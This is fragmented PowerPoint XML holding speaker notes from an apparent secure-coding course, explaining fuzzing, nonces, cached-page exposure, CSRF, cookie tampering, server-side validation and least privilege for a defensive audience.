              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10628984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10529DD5-58A1-411A-A104-CA6D0449180F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64515" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DF9E398-7E66-447B-83F1-5196C10F4FA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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Fuzz testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>fuzzing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> is a software testing technique, often automated or semi-automated, that involves providing invalid, unexpected, or random data to the inputs of a computer program. The program is then monitored for exceptions such as crashes or failing built-in code assertions. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Automated static analysis tools provide compile-time warnings that indicate where problems could occur.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64516" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9D1005E-3EBB-46EF-9130-15ACDC28ACE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BF58B3B-A4BE-475E-819F-A9EFF41C397A}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27389298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8355A32B-8F12-472C-88D7-8B7A6772D14D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46083" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1D50353-3B89-4107-9F84-E76D9278D51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Nonce = Active authorization ticket: Security code, or permission tag which indicates the maximum time the user has to respond.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MINOR EDIT NONCE DEFINITION ADDED IN PARENTHESIS (MEGAN)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46084" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{939C6C56-3B16-40E1-8FAF-F298856F4C8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F421358-9E61-406B-AD7F-182EA5DEDCD6}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30616698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87EB38D2-BE69-4BB6-905B-AC76F3158474}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39939" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A28E6254-9D6F-4DE2-B0C7-B0BC5683D7D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In this case, the server may be programmed correctly to respond only to authenticated users, but the web page is cached and available to anyone.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39940" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72633D26-4A93-426E-8D84-C6A5E683711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F80B30D-C2E0-47D4-8F81-5BF52449E445}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>32</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C4C92BBC-E7F9-485D-BDB9-F4B14D8C5B90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9219" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{845E350C-6744-4C24-A5E0-AE584CA77AD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Bad checks get passed signed by ‘Rubber Ducky’, so it is not improbable that silly input such as this may be entered.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>On some slides you will see 1, 2, or 3 mice indicating the severity of the problem. Here, the 3 mice at top right-hand side signify a currently popular problem. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9220" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D46E3AF-865D-47DD-89F7-56DF7F2B2AE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E5E5893-85F5-4FC8-8DFF-27149CC0155A}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6</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B7332B35-1DC2-47AE-9D3B-8656CE731EB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41987" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28F8EDC8-61F7-4DEE-A297-F9D38743B9C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In this case, the server may be programmed correctly to respond only to authenticated users, but the web page is cached and available to anyone.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41988" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CDE4496-6733-48F6-9507-3FFDD0F8154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E00B81B-9A07-4456-9D9C-DE6D28B0BCDF}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>33</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085679E7-0149-4E37-AB13-9678218014D6}"/>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1624DFB9-79E2-4C27-9B02-B218B18EDE1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Hash = integrity check </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Most invalid input will be the result of user error, not cracking attempts, and doing client-side validation can save processing time and bandwidth for your servers.  However the server still needs to double check input.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16388" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21E68112-1C1F-4C14-8082-45B6F30B26B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64C22B5-9E16-4E1E-86FD-F3A8BBE04133}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>34</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9AD9A9DA-9046-45CC-9A3E-D9C299159852}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37891" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31E68B9A-1818-494B-A087-98C8B5EE045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https://cwe.mitre.org/data/definitions/352.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Here the attacker is pretending to be someone else, sending in fake data.  He may try to bypass authentication and proceed straight to the middle of someone else’s session.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37892" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C61F98CA-9CF0-4D16-9D27-DE374B12A39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CFEA769-697B-4D7F-8189-9778F00FF074}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5079401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9AD9A9DA-9046-45CC-9A3E-D9C299159852}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37891" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31E68B9A-1818-494B-A087-98C8B5EE045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Here the attacker is pretending to be someone else, sending in fake data.  He may try to bypass authentication and proceed straight to the middle of someone else’s session.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37892" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C61F98CA-9CF0-4D16-9D27-DE374B12A39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CFEA769-697B-4D7F-8189-9778F00FF074}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13353269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30738B14-7102-437B-8BD1-5941540B6C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443EE05-F3D5-4E0E-87EC-0CDDCC7D2D7E}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44035" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98FCBA31-F0B7-4D4F-8B71-3BA943A2369D}"/>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4195B584-70F1-4E31-A027-7B3EC1B6B5D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Answers on future page.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8979463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the user edits the cookie to replace Andrea and user with Alice and admin, to change permissions while still using a valid authentication mechanism.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{006D0218-2B54-4A95-9FE9-6F57B92F1A87}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30539673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8513DFEF-181F-47AE-968D-702711C7F258}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28675" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{049E83DD-ACF9-47B9-821B-F6838E5964C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NEW SLIDE (MEGAN)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28676" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{603E2257-608C-4E22-B638-B6C329E6D18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2A7CCE2-9DB2-41A5-9FA2-71D9C295EE4B}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>41</a:t>
            </a:fld>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A0DA6220-EA8E-48B9-A308-5D6ED0F267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61AAEDA-0BB1-4430-9FA3-57EF64AC24CD}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48131" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD7F474C-14B7-4CE3-BE57-46C719E18BFA}"/>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EBB3B593-00FE-4169-8445-373CAC9F5D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The dog is ‘sniffing’.  That is what hackers (or admins) do when they listen to traffic on a communications medium.</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One mouse means not a significant problem (but still a problem).</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OWASP Top 10- 2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{006D0218-2B54-4A95-9FE9-6F57B92F1A87}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41115089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B3EC023C-B43F-4F37-9188-C34193222983}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53251" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C93B23F-2A3C-4354-8720-B23F2F004B0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If attackers take advantage of your flexibility, it is best to provide them only minimal permissions, by restricting their access.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53252" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0CDB262-F6B5-4552-AD5A-4A43DC5A423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DEBEA8-C49D-4B00-B72F-5C917FE04690}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>62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74AF66FF-03BB-4CDC-8D05-5134D3BF0EBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13315" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C3FBEB6-FA90-4978-9C0E-D36F6FED59E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Validation should be fully checked on the server side;  the code that gets executed on the client’s browser can be viewed and altered by the client.  (next two slides)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13316" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12CCACBB-1D44-45D5-9005-3C2618673C0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490FF50-24D9-49DA-BE0D-8F84A2268728}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>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1FF9FA71-6812-4DA8-8062-4BDE087CF1B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39AA072-CD12-401A-8B74-2F897275A1C2}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56323" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88B5655E-7AE7-4456-A610-4F38D40155DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56324" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EE27E01-E3EE-4011-9875-6DA7A84C57C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Some errors are 3 stars, others are 1 star</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88921009-B1CB-4AAB-A28F-37DE7B04268C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58371" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F757CDB-3E44-4FF6-9D7F-9AA0E295944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For 2: create own easy security.dat and run executable from the new location.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58372" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16341ACA-D5F8-4BEB-9C80-7275F71C102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3BF8F19-A2F2-4A2A-934E-EEB637B3815F}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>67</a:t>
            </a:fld>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9971743F-9905-41F5-BD69-93966E18C44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FD75A00-3B4B-4578-806F-51EB6B39D3A1}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60419" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54CF7875-9A10-44FC-9FB7-18829F2CF504}"/>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D781E04B-5034-4F5B-95E7-CD93698C205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Some errors are 3 stars, others are 1 star</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40242E61-FFC0-4189-BC93-D4D8BC6B6E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1C753C3-6A31-4EE1-9CFA-C871E82B247B}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62467" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5AEE62C-6531-48A6-8FE5-9244C5EB0F09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62468" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AE1BD7C-F0BF-444F-B42E-32F6EC3A51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Some errors are 3 stars, others are 1 star</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C887D743-E12B-4F80-BF3B-634A90010C56}"/>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634D941E-0084-4D27-95A0-0C1D739806D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69636" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A93EB5AA-D278-4BE4-8804-8630A07BEF6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B197C62-2683-4D84-BF81-AE4582DC41BC}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
